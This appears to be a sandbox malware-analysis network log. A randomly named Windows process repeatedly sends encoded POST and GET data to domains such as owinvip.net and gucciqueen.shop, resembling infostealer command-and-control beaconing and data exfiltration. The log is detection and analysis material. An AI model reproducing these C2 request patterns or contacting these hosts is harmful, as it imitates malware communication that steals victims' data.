44 36 61 75 49 69 79 52 7a 51 55 57 73 68 37 62 67 48 34 51 2f 64 61 70 4e 2f 2b 68 47 56 48 6a 69 44 47 33 49 49 38 55 52 58 50 59 6d 5a 6b 52 41 66 4c 64 47 33 75 30 53 65 4b 4b 35 61 79 6f 71 54 30 57 6f 55 66 52 67 4f 46 70 6f 42 32 78 4f 5a 77 6a 46 4a 6a 63 71 4c 77 7a 72 63 63 71 46 58 2f 68 73 39 63 42 2b 34 4f 4a 6d 65 41 44 71 39 2b 64 41 71 4b 35 56 31 4c 72 6c 68 73 37 7a 4d 62 52 5a 46 4d 2f 45 36 42 78 47 74 64 65 66 52 62 34 31 39 6e 6b 68 4c 5a 63 67 64 4a 36 65 78 46 6b 48 56 6e 58 42 59 71 68 5a 66 66 4c 51 73 2f 67 36 4f 72 51 2f 2f 50 31 62 73 41 2f 59 72 35 63 61 45 2b 4c 4f 46 48 7a 32 6d 65 55 45 34 36 79 64 69 66 35 55 47 58 43 34 30 44 62 49 30 56 59 65 6e 68 4e 55 50 4f 77 6b 45 38 58 2f 4d 6a 33 77 61 72 4e 77 66 41 44 64 77 71 37 6b 45 58 4d 4b 47 63 68 4e 75 45 54 4f 53 4a 7a 67 50 42 47 4b 6a 75 50 56 [TRUNCATED] Data Ascii: 1Zgl=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNobLEz9S00uD6auIiyRzQUWsh7bgH4Q/dapN/+hGVHjiDG3II8URXPYmZkRAfLdG3u0SeKK5ayoqT0WoUfRgOFpoB2xOZwjFJjcqLwzrccqFX/hs9cB+4OJmeADq9+dAqK5V1Lrlhs7zMbRZFM/E6BxGtdefRb419nkhLZcgdJ6exFkHVnXBYqhZffLQs/g6OrQ//P1bsA/Yr5caE+LOFHz2meUE46ydif5UGXC40DbI0VYenhNUPOwkE8X/Mj3warNwfADdwq7kEXMKGchNuETOSJzgPBGKjuPVBZv6SiL7bTPcmMnBKVUoXmaddCRwssFt4kobmAc/QjTsxpVFf5RBjwRXGMdgTT0JuMaWbr7yZFsYtKY53eQXKb7ddF2dufSjnMEZLCSPaRWVTMpWOZfCfSU6WDNnQ+mECXvPimMKyuvSAQrP2LY+Yfv/wCu0vkWSfGhpXocMyWVUMqhHg6qvLzq3dLUJDFiuR9fuQqyBVH3sJIjBoWXPFOvwQZG84mZmigu+YU/T1fqJGVO2hitB4aRze85E8M2EFW+YGDLDr5JXu/aownis49e1EkhXZCMeko+VVGv6edLHgPBdZeGwipWIlhxNXItL+KjmypIZuT05+7vVBVo+W+VsPe4LEB/y9s2MZuNxKwCrbJ0ZFWtOKhXP5B4f+d/Jd+fUmEaeWhzzwuGplNFjUfaPacRUzkjKsOB0smY9eMftdJaBC/Dd8XwvJd5F2Vv797qTZ4cKYKOyZJT9/+u+dj8vXzOvSW9ttI5feEJWVChoFAcmu6EKgjY4mT9We62VHc3vA+2CQvKOq3E9HUH3hc4T1rds6ldjm8LYyFO3UWGYtVpRD4ZvdQFfTG5wVDzFchHzGdeJykbOmHiUHBhJT+KpWNkh0VVO4nYBggwytrn6JwSXHgFjKGz4XIkJiT9Mgoq/ZEfdCNPOeMxc2NUaKr5KgAPBpUYZSJ [TRUNCATED]
Oct 31, 2024 10:28:07.736751080 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:07 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Oct 31, 2024 10:28:07.736799002 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50022	38.88.82.56	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:09.577969074 CET	462	OUT	GET /lk0h/?w6=2vdPP&1Zgl=6gjDnw5yzGoGzEh3mjJB1T6RyTIMcIq1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeElEmTDOsUVTaZy7krB/rdHBCDX+Ht0YGWoHEVrkeyh8Ng2A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.college-help.info User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:28:10.267272949 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:10 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Oct 31, 2024 10:28:10.267280102 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50023	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:15.517599106 CET	713	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 73 61 46 32 41 56 4e 51 35 4b 75 34 52 39 48 47 70 31 46 64 37 6d 6e 7a 6d 45 58 34 63 74 65 6c 32 45 2b 53 68 6f 45 64 6e 59 57 7a 62 52 54 4f 74 71 66 51 2b 56 76 50 50 78 4b 2f 6f 74 36 44 67 6b 71 71 44 78 5a 76 67 5a 41 51 49 63 76 77 34 63 35 35 77 75 2f 64 55 56 4e 74 57 66 65 58 2b 6d 6a 4b 4c 68 34 47 73 62 41 4b 74 57 68 53 67 6a 51 71 41 46 74 72 73 55 38 75 4c 4b 70 73 39 4c 78 66 78 4a 30 79 62 51 6f 4b 74 4d 43 72 2f 54 74 71 79 4d 64 70 70 6a 6e 79 57 41 38 6d 61 31 62 6a 4d 53 78 42 62 6f 45 56 74 56 72 58 34 68 4d 71 49 57 55 7a 4b 73 41 3d Data Ascii: 1Zgl=zgRK9aaXbRj1saF2AVNQ5Ku4R9HGp1Fd7mnzmEX4ctel2E+ShoEdnYWzbRTOtqfQ+VvPPxK/ot6DgkqqDxZvgZAQIcvw4c55wu/dUVNtWfeX+mjKLh4GsbAKtWhSgjQqAFtrsU8uLKps9LxfxJ0ybQoKtMCr/TtqyMdppjnyWA8ma1bjMSxBboEVtVrX4hMqIWUzKsA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50024	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:18.066993952 CET	733	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 36 6c 32 6c 4f 53 69 70 45 64 72 34 57 7a 55 78 54 4c 79 36 65 53 2b 56 54 48 50 78 6d 2f 6f 73 65 44 67 68 4f 71 44 43 42 67 68 4a 41 53 42 38 76 6c 31 38 35 35 77 75 2f 64 55 56 59 41 57 66 32 58 2b 58 54 4b 4e 41 34 48 67 37 41 4a 71 57 68 53 71 44 51 78 41 46 74 64 73 51 30 49 4c 4a 42 73 39 4f 4e 66 78 64 68 41 56 51 70 50 6a 73 44 4a 33 69 45 79 72 39 30 67 31 6c 71 6f 4a 44 6b 54 62 44 71 4a 57 77 35 70 49 49 6f 74 39 47 6a 67 70 52 74 44 53 31 45 44 55 37 57 66 75 42 78 6f 4a 78 4a 79 33 58 4f 41 51 52 5a 75 62 2b 41 6a Data Ascii: 1Zgl=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWde6l2lOSipEdr4WzUxTLy6eS+VTHPxm/oseDghOqDCBghJASB8vl1855wu/dUVYAWf2X+XTKNA4Hg7AJqWhSqDQxAFtdsQ0ILJBs9ONfxdhAVQpPjsDJ3iEyr90g1lqoJDkTbDqJWw5pIIot9GjgpRtDS1EDU7WfuBxoJxJy3XOAQRZub+Aj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50025	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:20.616404057 CET	1750	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 79 6c 31 58 32 53 6b 36 63 64 6f 34 57 7a 4b 68 54 4b 79 36 65 54 2b 56 4c 44 50 78 37 64 6f 76 32 44 6a 43 32 71 4c 58 31 67 72 4a 41 53 44 38 75 43 34 63 35 67 77 75 50 5a 55 56 49 41 57 66 32 58 2b 55 62 4b 4e 52 34 48 6d 37 41 4b 74 57 68 65 67 6a 52 65 41 46 31 4e 73 51 78 31 4c 35 68 73 38 76 39 66 30 75 5a 41 4b 67 70 4e 75 4d 44 76 33 69 59 54 72 39 35 62 31 6c 32 47 4a 44 63 54 61 6c 33 76 4b 6a 67 33 52 65 6b 74 2f 47 33 58 34 56 6c 30 61 54 41 74 59 59 32 70 6a 67 31 31 44 31 38 2b 69 44 44 63 53 31 6c 4c 52 34 56 78 34 47 66 7a 64 67 35 5a 33 32 30 62 33 41 76 62 71 43 53 48 61 47 61 41 73 6d 49 48 4e 71 42 69 4c 36 74 77 33 73 69 67 6c 6c 30 4d 54 30 38 54 39 46 49 6e 79 67 63 63 67 43 66 46 36 6c 4c 39 47 5a 45 2f 78 76 4d 64 72 4d 6e 4e 7a 77 36 5a 34 44 63 6c 69 6c 6c 6b 78 72 35 6e 38 73 77 66 79 4e 2f 61 45 69 6f 37 49 31 79 31 59 32 79 59 53 [TRUNCATED] Data Ascii: 1Zgl=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWdeyl1X2Sk6cdo4WzKhTKy6eT+VLDPx7dov2DjC2qLX1grJASD8uC4c5gwuPZUVIAWf2X+UbKNR4Hm7AKtWhegjReAF1NsQx1L5hs8v9f0uZAKgpNuMDv3iYTr95b1l2GJDcTal3vKjg3Rekt/G3X4Vl0aTAtYY2pjg11D18+iDDcS1lLR4Vx4Gfzdg5Z320b3AvbqCSHaGaAsmIHNqBiL6tw3sigll0MT08T9FInygccgCfF6lL9GZE/xvMdrMnNzw6Z4Dclillkxr5n8swfyN/aEio7I1y1Y2yYSnDyMCyBm9MXlHRIRlAz65HbZTKaIZbV4tJi0kGMCKJ3g7AySyKakw12woVKxoPBx1lTvu50yMn7o34JaJvLLzZQWYsylv2jR2OR6GLjqtHDVERLUd1WwvV2/aRrdLNT6a0y51Q+H2PetuVOcYsVzyZ3yi5m/mLX+lPCnQ3AAmzusyGyOHVV3B/s4OkxkcrKxN9EGC3IiBFcP7k9bE60Lj4Y5ecC4A7h4uGpI38fAPnt5pbZv7jFjIeIU1eijRHPVOJ6tNi1mS0kj8ZXEGWrqDM8i+SrVhAQQXxSC1B3b81cATg5AH+1Cz9HIJeKkhxd53BqJYuwcSCZyP3KUrOhYqmnnT6nkkKBWDE6ezy6g/9g/n7i56wECRdWJPNB1M3C5nItn16rUqRljVpjKWZmqAI1svkK5d7prcjJOC4VN39MTfHbcpPiKDP2WehE1kBKGEISC/XKUrXT5zc3q8ftIlr9fl0dbY6n6ub/9MiOlyxfYZnS3mVSnryZmzge+RDNEvN6NaIGbAFqoTLmE2vwhEYSwJPWIal9XoxmGxdKV1JcPh7w9e4QnaH605zvVpRKWEUt2ZCs8HFAaeY1qEhmvJ3p1O/o81Qb53v5ESWnQcCYQKGKcUWoVbu+0UYA9JtkvXzxzhfTIxufw5fIqN4/Sxr9+WsRJQk3DJE [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50026	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:23.165590048 CET	456	OUT	GET /17h7/?1Zgl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.owinvip.net User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:28:23.782612085 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 31 Oct 2024 09:28:23 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 67 6c 3d 2b 69 35 71 2b 75 7a 50 58 6d 66 74 79 5a 74 4e 5a 57 46 72 38 4d 43 37 59 6f 43 6d 76 79 42 74 33 6a 6a 58 2f 58 33 6f 52 4e 50 4a 37 30 65 4f 32 35 4e 30 77 34 7a 71 57 67 50 34 37 34 37 4f 70 56 58 73 49 68 6e 5a 76 37 6e 4d 6d 6a 65 58 49 53 42 74 6f 61 49 52 43 2f 65 30 30 4f 67 59 38 38 4c 2b 61 30 55 44 44 49 79 46 33 6b 71 31 42 53 4a 68 70 2f 6c 49 32 31 41 69 2b 51 41 36 55 51 3d 3d 26 77 36 3d 32 76 64 50 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1Zgl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&w6=2vdPP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50027	178.79.184.196	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:28.838083029 CET	725	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4b 71 37 4b 77 31 50 30 56 38 69 6b 47 79 46 73 2f 5a 69 31 4d 57 38 4b 51 6d 63 31 43 36 31 37 56 51 50 38 31 63 5a 4c 33 51 4a 43 2b 47 42 55 65 76 43 32 53 62 63 66 75 44 45 7a 6c 54 38 56 66 6e 74 75 43 31 34 39 67 79 6a 32 2f 74 49 74 2f 61 5a 4a 32 69 4c 68 55 34 52 7a 4c 4c 6f 5a 4f 65 35 51 63 4b 75 30 2b 37 6b 44 37 62 33 59 6f 72 6d 56 34 72 63 46 46 49 6e 76 6a 55 47 46 6d 63 34 62 77 4a 35 42 4d 4a 38 72 44 6e 78 6f 76 50 69 35 7a 5a 52 6f 2b 52 30 6a 33 57 76 57 37 39 46 69 2f 52 79 45 4d 46 7a 31 49 73 59 64 42 34 36 6b 39 62 49 4e 70 57 49 3d Data Ascii: 1Zgl=LocG8q5s0TizKq7Kw1P0V8ikGyFs/Zi1MW8KQmc1C617VQP81cZL3QJC+GBUevC2SbcfuDEzlT8VfntuC149gyj2/tIt/aZJ2iLhU4RzLLoZOe5QcKu0+7kD7b3YormV4rcFFInvjUGFmc4bwJ5BMJ8rDnxovPi5zZRo+R0j3WvW79Fi/RyEMFz1IsYdB46k9bINpWI=
Oct 31, 2024 10:28:29.615266085 CET	461	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:29 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50028	178.79.184.196	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:31.381603956 CET	745	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4a 4f 2f 4b 6a 6d 58 30 43 4d 69 6e 4a 53 46 73 31 35 69 35 4d 58 41 4b 51 6e 70 71 42 49 52 37 55 31 72 38 32 64 5a 4c 6e 41 4a 43 30 6d 42 52 61 76 44 34 53 62 59 58 75 47 6b 7a 6c 53 63 56 66 69 52 75 44 47 51 79 76 43 6a 77 2b 64 49 56 79 36 5a 4a 32 69 4c 68 55 34 56 5a 4c 4c 77 5a 4f 4f 4a 51 64 72 75 31 69 72 6b 45 74 72 33 59 2b 62 6d 52 34 72 63 72 46 4a 37 42 6a 58 75 46 6d 64 49 62 7a 61 68 47 62 35 38 6c 65 58 77 57 68 4d 62 30 35 71 52 30 35 69 4e 32 68 56 50 32 33 72 30 49 6c 7a 36 73 66 6c 66 4e 59 2f 51 71 51 49 62 4e 6e 34 59 39 33 42 63 69 52 49 46 44 79 38 67 50 30 70 58 53 68 61 38 55 33 39 64 50 Data Ascii: 1Zgl=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIR7U1r82dZLnAJC0mBRavD4SbYXuGkzlScVfiRuDGQyvCjw+dIVy6ZJ2iLhU4VZLLwZOOJQdru1irkEtr3Y+bmR4rcrFJ7BjXuFmdIbzahGb58leXwWhMb05qR05iN2hVP23r0Ilz6sflfNY/QqQIbNn4Y93BciRIFDy8gP0pXSha8U39dP
